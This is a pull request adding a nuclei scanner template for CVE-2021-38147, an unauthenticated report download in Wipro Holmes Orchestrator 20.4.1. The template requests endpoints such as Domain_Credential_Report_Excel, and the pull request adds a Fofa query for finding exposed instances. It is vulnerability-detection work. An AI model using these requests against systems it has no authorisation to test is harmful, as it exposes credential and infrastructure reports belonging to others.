### PR TITLE
add CVE-2021-38147

### DIFF
--- a/http/cves/2021/CVE-2021-38147.yaml
+++ b/http/cves/2021/CVE-2021-38147.yaml
@@ -37,6 +37,6 @@ http:
       - type: dsl
         dsl:
           - "contains(body, '<?xml version=')"
-          - "contains(header, 'application/vnd.openxml')
+          - "contains(header, 'application/vnd.openxml')"
           - "status_code == 200"
         condition: and

--- a/http/cves/2021/CVE-2021-38147.yaml
+++ b/http/cves/2021/CVE-2021-38147.yaml
@@ -1,0 +1,40 @@
+id: CVE-2021-38147
+
+info:
+  name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download
+  author: securityforeveryone
+  severity: high
+  description: |
+    Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
+  remediation: Fixed In v21.4.0
+  reference:
+    - https://www.wipro.com/holmes/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
+    - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-38147
+    cwe-id: CWE-306
+    epss-score: 0.00497
+    epss-percentile: 0.76242
+    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
+  metadata:
+    vendor: wipro
+    product: holmes
+  tags: packetstorm,download,exposure,cve,cve2021
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body, '<?xml version=')"
+          - "status_code == 200"
+        condition: and

--- a/http/cves/2021/CVE-2021-38147.yaml
+++ b/http/cves/2021/CVE-2021-38147.yaml
@@ -1,16 +1,17 @@
 id: CVE-2021-38147
 
 info:
-  name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download
+  name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
   author: securityforeveryone
   severity: high
   description: |
     Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
-  remediation: Fixed In v21.4.0
+  remediation: |
+    Fixed In v21.4.0
   reference:
-    - https://www.wipro.com/holmes/
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
     - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
+    - https://www.wipro.com/holmes/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -20,8 +21,10 @@ info:
     epss-percentile: 0.76242
     cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
   metadata:
+    max-request: 4
     vendor: wipro
     product: holmes
+    fofa-query: title="Holmes Orchestrator"
   tags: cve,cve2021,wipro,holmes,orchestrator
 
 http:
@@ -36,7 +39,7 @@ http:
     matchers:
       - type: dsl
         dsl:
+          - "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')"
           - "contains(body, '<?xml version=')"
-          - "contains(header, 'application/vnd.openxml')"
           - "status_code == 200"
         condition: and

--- a/http/cves/2021/CVE-2021-38147.yaml
+++ b/http/cves/2021/CVE-2021-38147.yaml
@@ -22,7 +22,7 @@ info:
   metadata:
     vendor: wipro
     product: holmes
-  tags: packetstorm,download,exposure,cve,cve2021
+  tags: cve,cve2021,wipro,holmes,orchestrator
 
 http:
   - method: GET
@@ -32,9 +32,11 @@ http:
       - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
       - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
 
+    stop-at-first-match: true
     matchers:
       - type: dsl
         dsl:
           - "contains(body, '<?xml version=')"
+          - "contains(header, 'application/vnd.openxml')
           - "status_code == 200"
         condition: and


### PR DESCRIPTION
CVE-2021-38147
Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to 

processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.

poc sites 
https://flippingbitz.com/post/wipro-ho-2041-cve/
https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html

poc images  flippingbitz.com
![image](https://github.com/projectdiscovery/nuclei-templates/assets/90972683/816fbf6b-0bf6-4c4f-b33a-46d69ca660f1)
![image](https://github.com/projectdiscovery/nuclei-templates/assets/90972683/b6c7044a-f408-492a-a6f6-9367254ad33c)
![image](https://github.com/projectdiscovery/nuclei-templates/assets/90972683/4551d913-6d96-4f6e-ae03-3826ecb60769)






#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)